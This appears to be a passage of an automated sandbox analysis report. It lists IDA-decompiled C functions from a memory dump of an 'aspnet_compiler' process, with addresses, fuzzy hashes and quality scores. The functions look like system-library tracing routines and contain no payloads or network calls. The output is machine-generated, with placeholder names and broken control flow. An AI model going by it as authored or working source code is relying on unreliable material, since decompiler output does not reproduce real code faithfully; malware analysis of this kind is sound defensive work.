                          			E014B14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				short _v54;
                          				char _v60;
                          				void* __edi;
                          				void* __esi;
                          				signed char* _t21;
                          				intOrPtr _t27;
                          				intOrPtr _t33;
                          				intOrPtr _t34;
                          				signed int _t35;
                          
                          				_t32 = __edx;
                          				_t27 = __ebx;
                          				_v8 =  *0x14ed360 ^ _t35;
                          				_t33 = __edx;
                          				_t34 = __ecx;
                          				E0143FA60( &_v60, 0, 0x30);
                          				_v20 = _a4;
                          				_v16 = _a8;
                          				_v28 = _t34;
                          				_v24 = _t33;
                          				_v54 = 0x1034;
                          				if(E01417D50() == 0) {
                          					_t21 = 0x7ffe0388;
                          				} else {
                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          				}
                          				_push( &_v60);
                          				_push(0x10);
                          				_push(0x20402);
                          				_push( *_t21 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                          			}

















                          0x014b14fb
                          0x014b14fb
                          0x014b150a
                          0x014b1514
                          0x014b1519
                          0x014b151b
                          0x014b1526
                          0x014b152c
                          0x014b1534
                          0x014b1537
                          0x014b153a
                          0x014b1545
                          0x014b1557
                          0x014b1547
                          0x014b1550
                          0x014b1550
                          0x014b1562
                          0x014b1563
                          0x014b1565
                          0x014b156a
                          0x014b157f

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3034e9fb4a36ec872e91fe76c4e6ace5993cc41c1fd16322fe331568b18de259
                          • Instruction ID: e0e49d9c5f8ba6b499733f760f0e8fc7d7444edf6830792122648920583036bc
                          • Opcode Fuzzy Hash: 3034e9fb4a36ec872e91fe76c4e6ace5993cc41c1fd16322fe331568b18de259
                          • Instruction Fuzzy Hash: 0F018071A00249ABDB10EFA9D841FAEBBB8EF54700F40405BB915EB290D670DA01CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E013F58EC(intOrPtr __ecx) {
                          				signed int _v8;
                          				char _v28;
                          				char _v44;
                          				char _v76;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t10;
                          				intOrPtr _t16;
                          				intOrPtr _t17;
                          				intOrPtr _t27;
                          				intOrPtr _t28;
                          				signed int _t29;
                          
                          				_v8 =  *0x14ed360 ^ _t29;
                          				_t10 =  *[fs:0x30];
                          				_t27 = __ecx;
                          				if(_t10 == 0) {
                          					L6:
                          					_t28 = 0x13d5c80;
                          				} else {
                          					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                          					if(_t16 == 0) {
                          						goto L6;
                          					} else {
                          						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                          					}
                          				}
                          				if(E013F5943() != 0 &&  *0x14e5320 > 5) {
                          					E01477B5E( &_v44, _t27);
                          					_t22 =  &_v28;
                          					E01477B5E( &_v28, _t28);
                          					_t11 = E01477B9C(0x14e5320, 0x13dbf15,  &_v28, _t22, 4,  &_v76);
                          				}
                          				return E0143B640(_t11, _t17, _v8 ^ _t29, 0x13dbf15, _t27, _t28);
                          			}















                          0x013f58fb
                          0x013f58fe
                          0x013f5906
                          0x013f590a
                          0x013f593c
                          0x013f593c
                          0x013f590c
                          0x013f590c
                          0x013f5911
                          0x00000000
                          0x013f5913
                          0x013f5913
                          0x013f5913
                          0x013f5911
                          0x013f591d
                          0x01451035
                          0x0145103c
                          0x0145103f
                          0x01451056
                          0x01451056
                          0x013f593b

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba29bf430f2c9bfdfbc075896fe53e2d4bbdf96e8e67dc7015f630d2cd9b6577
                          • Instruction ID: b372864e35a578664134e5e48bcad97d1c7375836e089b7a3a0188dc5ab8ced0
                          • Opcode Fuzzy Hash: ba29bf430f2c9bfdfbc075896fe53e2d4bbdf96e8e67dc7015f630d2cd9b6577
                          • Instruction Fuzzy Hash: 4901F236A00109DBCB18EA69D804ABF7BACEF91128F94006E9A05AB664DE30DD05C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E014C1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                          				char _v8;
                          				void* _v11;
                          				unsigned int _v12;
                          				void* _v15;
                          				void* __esi;
                          				void* __ebp;
                          				char* _t16;
                          				signed int* _t35;
                          
                          				_t22 = __ebx;
                          				_t35 = __ecx;
                          				_v8 = __edx;
                          				_t13 =  !( *__ecx) + 1;
                          				_v12 =  !( *__ecx) + 1;
                          				if(_a4 != 0) {
                          					E014C165E(__ebx, 0x14e8ae4, (__edx -  *0x14e8b04 >> 0x14) + (__edx -  *0x14e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x14e8b04 >> 0x14) + (__edx -  *0x14e8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                          				}
                          				E014BAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                          				if(E01417D50() == 0) {
                          					_t16 = 0x7ffe0388;
                          				} else {
                          					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          				}
                          				if( *_t16 != 0) {
                          					_t16 = E014AFE3F(_t22, _t35, _v8, _v12);
                          				}
                          				return _t16;
                          			}











                          0x014c1074
                          0x014c1080
                          0x014c1082
                          0x014c108a
                          0x014c108f
                          0x014c1093
                          0x014c10ab
                          0x014c10ab
                          0x014c10c3
                          0x014c10cf
                          0x014c10e1
                          0x014c10d1
                          0x014c10da
                          0x014c10da
                          0x014c10e9
                          0x014c10f5
                          0x014c10f5
                          0x014c10fe

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7de40ab67bb0db778022ae913d7b44f5dc32a7659e702ba93bc8234b45ce7643
                          • Instruction ID: c090e20c3ace823833fe6b3923221d31d1937f6a8834093fa2c4b809f8edcb4d
                          • Opcode Fuzzy Hash: 7de40ab67bb0db778022ae913d7b44f5dc32a7659e702ba93bc8234b45ce7643
                          • Instruction Fuzzy Hash: 01012876604742DFC750DB2AC944B5B7BE5ABA4A10F04861EF985837B2DE30D841CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0140B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                          				signed char _t11;
                          				signed char* _t12;
                          				intOrPtr _t24;
                          				signed short* _t25;
                          
                          				_t25 = __edx;
                          				_t24 = __ecx;
                          				_t11 = ( *[fs:0x30])[0x50];
                          				if(_t11 != 0) {
                          					if( *_t11 == 0) {
                          						goto L1;
                          					}
                          					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                          					L2:
                          					if( *_t12 != 0) {
                          						_t12 =  *[fs:0x30];
                          						if((_t12[0x240] & 0x00000004) == 0) {
                          							goto L3;
                          						}
                          						if(E01417D50() == 0) {
                          							_t12 = 0x7ffe0385;
                          						} else {
                          							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                          						}
                          						if(( *_t12 & 0x00000020) == 0) {
                          							goto L3;
                          						}
                          						return E01477016(_a4, _t24, 0, 0, _t25, 0);
                          					}
                          					L3:
                          					return _t12;
                          				}
                          				L1:
                          				_t12 = 0x7ffe0384;
                          				goto L2;
                          			}







                          0x0140b037
                          0x0140b039
                          0x0140b03b
                          0x0140b040
                          0x0145a60e
                          0x00000000
                          0x00000000
                          0x0145a61d
                          0x0140b04b
                          0x0140b04e
                          0x0145a627
                          0x0145a634
                          0x00000000
                          0x00000000
                          0x0145a641
                          0x0145a653
                          0x0145a643
                          0x0145a64c
                          0x0145a64c
                          0x0145a65b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0145a66c
                          0x0140b057
                          0x0140b057
                          0x0140b057
                          0x0140b046
                          0x0140b046
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                          • Instruction ID: c472c793dd84bd80caba05f16fcc72c387ab534d298ad145bc9ba9503a889e81
                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                          • Instruction Fuzzy Hash: 59015EB62005849FE323D71EC948F677BD8EB95654F0940A2AA19CB7B2D638DC41C625
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E014AFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				signed int _v12;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				short _v58;
                          				char _v64;
                          				void* __edi;
                          				void* __esi;
                          				signed char* _t18;
                          				intOrPtr _t24;
                          				intOrPtr _t30;
                          				intOrPtr _t31;
                          				signed int _t32;
                          
                          				_t29 = __edx;
                          				_t24 = __ebx;
                          				_v12 =  *0x14ed360 ^ _t32;
                          				_t30 = __edx;
                          				_t31 = __ecx;
                          				E0143FA60( &_v64, 0, 0x30);
                          				_v24 = _a4;
                          				_v32 = _t31;
                          				_v28 = _t30;
                          				_v58 = 0x267;
                          				if(E01417D50() == 0) {
                          					_t18 = 0x7ffe0388;
                          				} else {
                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          				}
                          				_push( &_v64);
                          				_push(0x10);
                          				_push(0x20402);
                          				_push( *_t18 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                          			}
















                          0x014afe3f
                          0x014afe3f
                          0x014afe4e
                          0x014afe58
                          0x014afe5d
                          0x014afe5f
                          0x014afe6a
                          0x014afe72
                          0x014afe75
                          0x014afe78
                          0x014afe83
                          0x014afe95
                          0x014afe85
                          0x014afe8e
                          0x014afe8e
                          0x014afea0
                          0x014afea1
                          0x014afea3
                          0x014afea8
                          0x014afebd

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d428b79878993ab41f9aae181707df119d3fe910dac186e969ce1fba341aa06e
                          • Instruction ID: da8d733be592d1fe366a5b44a1e2fbb747b83e3d11623e627b6f9bdc5afe1aa0
                          • Opcode Fuzzy Hash: d428b79878993ab41f9aae181707df119d3fe910dac186e969ce1fba341aa06e
                          • Instruction Fuzzy Hash: 56018471E00249ABDB14EFA9D845FAFBBB8EF94710F40406BB900AB3A1DA709901C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E014AFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				signed int _v12;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				short _v58;
                          				char _v64;
                          				void* __edi;
                          				void* __esi;
                          				signed char* _t18;
                          				intOrPtr _t24;
                          				intOrPtr _t30;
                          				intOrPtr _t31;
                          				signed int _t32;
                          
                          				_t29 = __edx;
                          				_t24 = __ebx;
                          				_v12 =  *0x14ed360 ^ _t32;
                          				_t30 = __edx;
                          				_t31 = __ecx;
                          				E0143FA60( &_v64, 0, 0x30);
                          				_v24 = _a4;
                          				_v32 = _t31;
                          				_v28 = _t30;
                          				_v58 = 0x266;
                          				if(E01417D50() == 0) {
                          					_t18 = 0x7ffe0388;
                          				} else {
                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          				}
                          				_push( &_v64);
                          				_push(0x10);
                          				_push(0x20402);
                          				_push( *_t18 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                          			}
















                          0x014afec0
                          0x014afec0
                          0x014afecf
                          0x014afed9
                          0x014afede
                          0x014afee0
                          0x014afeeb
                          0x014afef3
                          0x014afef6
                          0x014afef9
                          0x014aff04
                          0x014aff16
                          0x014aff06
                          0x014aff0f
                          0x014aff0f
                          0x014aff21
                          0x014aff22
                          0x014aff24
                          0x014aff29
                          0x014aff3e

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5d3c55a3a24cfa0523d2a2ce0431e6310c57dfa2fe8b7f0457623484cc7dc8f
                          • Instruction ID: f50f874ad627f8b723e920a140091475cce93d3e2d2330af69d496a017c40fe1
                          • Opcode Fuzzy Hash: a5d3c55a3a24cfa0523d2a2ce0431e6310c57dfa2fe8b7f0457623484cc7dc8f
                          • Instruction Fuzzy Hash: 2B018871E01209ABDB14DBA9D845FAFB7B8EF54700F40406BBA049B3A1DA709901C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 54%
                          			E014C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				signed int _v12;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				short _v66;
                          				char _v72;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed char* _t18;
                          				signed int _t32;
                          
                          				_t29 = __edx;
                          				_v12 =  *0x14ed360 ^ _t32;
                          				_t31 = _a8;
                          				_t30 = _a12;
                          				_v66 = 0x1c20;
                          				_v40 = __ecx;
                          				_v36 = __edx;
                          				_v32 = _a4;
                          				_v28 = _a8;
                          				_v24 = _a12;
                          				if(E01417D50() == 0) {
                          					_t18 = 0x7ffe0386;
                          				} else {
                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          				}
                          				_push( &_v72);
                          				_push(0x14);
                          				_push(0x20402);
                          				_push( *_t18 & 0x000000ff);
                          				return E0143B640(E01439AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                          			}
















                          0x014c8a62
                          0x014c8a71
                          0x014c8a79
                          0x014c8a82
                          0x014c8a85
                          0x014c8a89
                          0x014c8a8c
                          0x014c8a8f
                          0x014c8a92
                          0x014c8a95
                          0x014c8a9f
                          0x014c8ab1
                          0x014c8aa1
                          0x014c8aaa
                          0x014c8aaa
                          0x014c8abc
                          0x014c8abd
                          0x014c8abf
                          0x014c8ac4
                          0x014c8ada

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac7e38129749cce71bbc48f2f1cb6f0a1750ca83e53311b2252f9f1f3771f6c3
                          • Instruction ID: 335f5daf677d5679d70f9e9a39eef429394cd5070452db7b07a6495afe3c946c
                          • Opcode Fuzzy Hash: ac7e38129749cce71bbc48f2f1cb6f0a1750ca83e53311b2252f9f1f3771f6c3
                          • Instruction Fuzzy Hash: 67012C75A0021DAFCB00DFA9D9419AEBBB8EF98710F10405BF904E7361D634A901CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 54%
                          			E014C8ED6(intOrPtr __ecx, intOrPtr __edx) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				short _v62;
                          				char _v68;
                          				signed char* _t29;
                          				intOrPtr _t35;
                          				intOrPtr _t41;
                          				intOrPtr _t42;
                          				signed int _t43;
                          
                          				_t40 = __edx;
                          				_v8 =  *0x14ed360 ^ _t43;
                          				_v28 = __ecx;
                          				_v62 = 0x1c2a;
                          				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                          				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                          				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                          				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                          				_v24 = __edx;
                          				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                          				if(E01417D50() == 0) {
                          					_t29 = 0x7ffe0386;
                          				} else {
                          					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          				}
                          				_push( &_v68);
                          				_push(0x1c);
                          				_push(0x20402);
                          				_push( *_t29 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                          			}


















                          0x014c8ed6
                          0x014c8ee5
                          0x014c8eed
                          0x014c8ef0
                          0x014c8efa
                          0x014c8f03
                          0x014c8f0c
                          0x014c8f15
                          0x014c8f24
                          0x014c8f27
                          0x014c8f31
                          0x014c8f43
                          0x014c8f33
                          0x014c8f3c
                          0x014c8f3c
                          0x014c8f4e
                          0x014c8f4f
                          0x014c8f51
                          0x014c8f56
                          0x014c8f69

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0bad8d89b23ef17f71e40bcf42df02b65d5deb24200c0bbe67f6b0ba48ff954e
                          • Instruction ID: 3c1a234ff6243db84d39722944eaa6cd89fb5319be278b2bbba1135cfba35edb
                          • Opcode Fuzzy Hash: 0bad8d89b23ef17f71e40bcf42df02b65d5deb24200c0bbe67f6b0ba48ff954e
                          • Instruction Fuzzy Hash: 9C111E70E0025A9FDB44DFA9D441BAEBBF4FF58700F1442AAE518EB392E6349941CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013FDB60(signed int __ecx) {
                          				intOrPtr* _t9;
                          				void* _t12;
                          				void* _t13;
                          				intOrPtr _t14;
                          
                          				_t9 = __ecx;
                          				_t14 = 0;
                          				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                          					_t13 = 0xc000000d;
                          				} else {
                          					_t14 = E013FDB40();
                          					if(_t14 == 0) {
                          						_t13 = 0xc0000017;
                          					} else {
                          						_t13 = E013FE7B0(__ecx, _t12, _t14, 0xfff);
                          						if(_t13 < 0) {
                          							L013FE8B0(__ecx, _t14, 0xfff);
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                          							_t14 = 0;
                          						} else {
                          							_t13 = 0;
                          							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                          						}
                          					}
                          				}
                          				 *_t9 = _t14;
                          				return _t13;
                          			}







                          0x013fdb64
                          0x013fdb66
                          0x013fdb6b
                          0x013fdbaa
                          0x013fdb71
                          0x013fdb76
                          0x013fdb7a
                          0x013fdba3
                          0x013fdb7c
                          0x013fdb87
                          0x013fdb8b
                          0x01454fa1
                          0x01454fb3
                          0x01454fb8
                          0x013fdb91
                          0x013fdb96
                          0x013fdb98
                          0x013fdb98
                          0x013fdb8b
                          0x013fdb7a
                          0x013fdb9d
                          0x013fdba2

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                          • Instruction ID: 74ad18026e6e7f24e3c1cd6ebe1d05fea59e591f2b89213a2f0e54862fd0a910
                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                          • Instruction Fuzzy Hash: BEF09C3324152B9BD7326EDD4888F57BA999FD1A68F16003EF7059B754C9708C0297D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                          				signed char* _t13;
                          				intOrPtr _t22;
                          				char _t23;
                          
                          				_t23 = __edx;
                          				_t22 = __ecx;
                          				if(E01417D50() != 0) {
                          					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                          				} else {
                          					_t13 = 0x7ffe0384;
                          				}
                          				if( *_t13 != 0) {
                          					_t13 =  *[fs:0x30];
                          					if((_t13[0x240] & 0x00000004) == 0) {
                          						goto L3;
                          					}
                          					if(E01417D50() == 0) {
                          						_t13 = 0x7ffe0385;
                          					} else {
                          						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                          					}
                          					if(( *_t13 & 0x00000020) == 0) {
                          						goto L3;
                          					}
                          					return E01477016(0x14a4, _t22, _t23, _a4, _a8, 0);
                          				} else {
                          					L3:
                          					return _t13;
                          				}
                          			}






                          0x013fb1e8
                          0x013fb1ea
                          0x013fb1f3
                          0x01454a17
                          0x013fb1f9
                          0x013fb1f9
                          0x013fb1f9
                          0x013fb201
                          0x01454a21
                          0x01454a2e
                          0x00000000
                          0x00000000
                          0x01454a3b
                          0x01454a4d
                          0x01454a3d
                          0x01454a46
                          0x01454a46
                          0x01454a55
                          0x00000000
                          0x00000000
                          0x00000000
                          0x013fb20a
                          0x013fb20a
                          0x013fb20a
                          0x013fb20a

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                          • Instruction ID: 29506f98438203c0aae5c5892b4fbed2eb251c471212faecb08dc4d654d9dccd
                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                          • Instruction Fuzzy Hash: 0001F936200584ABD322975DC804F5ABB98EF51794F0C0066FE148B7B7E674CC40C314
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E0148FE87(intOrPtr __ecx) {
                          				signed int _v8;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				short _v54;
                          				char _v60;
                          				signed char* _t21;
                          				intOrPtr _t27;
                          				intOrPtr _t32;
                          				intOrPtr _t33;
                          				intOrPtr _t34;
                          				signed int _t35;
                          
                          				_v8 =  *0x14ed360 ^ _t35;
                          				_v16 = __ecx;
                          				_v54 = 0x1722;
                          				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                          				_v28 =  *((intOrPtr*)(__ecx + 4));
                          				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                          				if(E01417D50() == 0) {
                          					_t21 = 0x7ffe0382;
                          				} else {
                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                          				}
                          				_push( &_v60);
                          				_push(0x10);
                          				_push(0x20402);
                          				_push( *_t21 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                          			}
















                          0x0148fe96
                          0x0148fe9e
                          0x0148fea1
                          0x0148fead
                          0x0148feb3
                          0x0148feb9
                          0x0148fec3
                          0x0148fed5
                          0x0148fec5
                          0x0148fece
                          0x0148fece
                          0x0148fee0
                          0x0148fee1
                          0x0148fee3
                          0x0148fee8
                          0x0148fefb

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8853a197b40da897a7d31b9c3ffa11731e0f11f3aa412a9d622a3a2d8a07a5c0
                          • Instruction ID: 9bd1ab878ddac5ecdd78d44a16ba1c41e118a7339015ebf6c8bad9e9cc0da2d7
                          • Opcode Fuzzy Hash: 8853a197b40da897a7d31b9c3ffa11731e0f11f3aa412a9d622a3a2d8a07a5c0
                          • Instruction Fuzzy Hash: 3C016270A0020DEFCB14EFA9D541A6EB7F4EF18704F10415AA514DB392D635D902CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E014B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				short _v50;
                          				char _v56;
                          				signed char* _t18;
                          				intOrPtr _t24;
                          				intOrPtr _t30;
                          				intOrPtr _t31;
                          				signed int _t32;
                          
                          				_t29 = __edx;
                          				_v8 =  *0x14ed360 ^ _t32;
                          				_v20 = _a4;
                          				_v12 = _a8;
                          				_v24 = __ecx;
                          				_v16 = __edx;
                          				_v50 = 0x1021;
                          				if(E01417D50() == 0) {
                          					_t18 = 0x7ffe0380;
                          				} else {
                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          				}
                          				_push( &_v56);
                          				_push(0x10);
                          				_push(0x20402);
                          				_push( *_t18 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                          			}















                          0x014b131b
                          0x014b132a
                          0x014b1330
                          0x014b1336
                          0x014b133e
                          0x014b1341
                          0x014b1344
                          0x014b134f
                          0x014b1361
                          0x014b1351
                          0x014b135a
                          0x014b135a
                          0x014b136c
                          0x014b136d
                          0x014b136f
                          0x014b1374
                          0x014b1387

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b2f138c934d72fbafaed7775074b01c41afc6bbc124c9bc971df86bfc33662f
                          • Instruction ID: 4d17702d72b356934a55ceb6b2b5b32ac8943935f4c7b86e4b3cdff10bc0d9c1
                          • Opcode Fuzzy Hash: 4b2f138c934d72fbafaed7775074b01c41afc6bbc124c9bc971df86bfc33662f
                          • Instruction Fuzzy Hash: CB018C71E0120DAFCB00EFA9D545AAEB7F4FF58700F00405AB805EB3A1E6309A00CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E014C8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				short _v50;
                          				char _v56;
                          				signed char* _t18;
                          				intOrPtr _t24;
                          				intOrPtr _t30;
                          				intOrPtr _t31;
                          				signed int _t32;
                          
                          				_t29 = __edx;
                          				_v8 =  *0x14ed360 ^ _t32;
                          				_v16 = __ecx;
                          				_v50 = 0x1c2c;
                          				_v24 = _a4;
                          				_v20 = _a8;
                          				_v12 = __edx;
                          				if(E01417D50() == 0) {
                          					_t18 = 0x7ffe0386;
                          				} else {
                          					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          				}
                          				_push( &_v56);
                          				_push(0x10);
                          				_push(0x402);
                          				_push( *_t18 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                          			}















                          0x014c8f6a
                          0x014c8f79
                          0x014c8f81
                          0x014c8f84
                          0x014c8f8b
                          0x014c8f91
                          0x014c8f94
                          0x014c8f9e
                          0x014c8fb0
                          0x014c8fa0
                          0x014c8fa9
                          0x014c8fa9
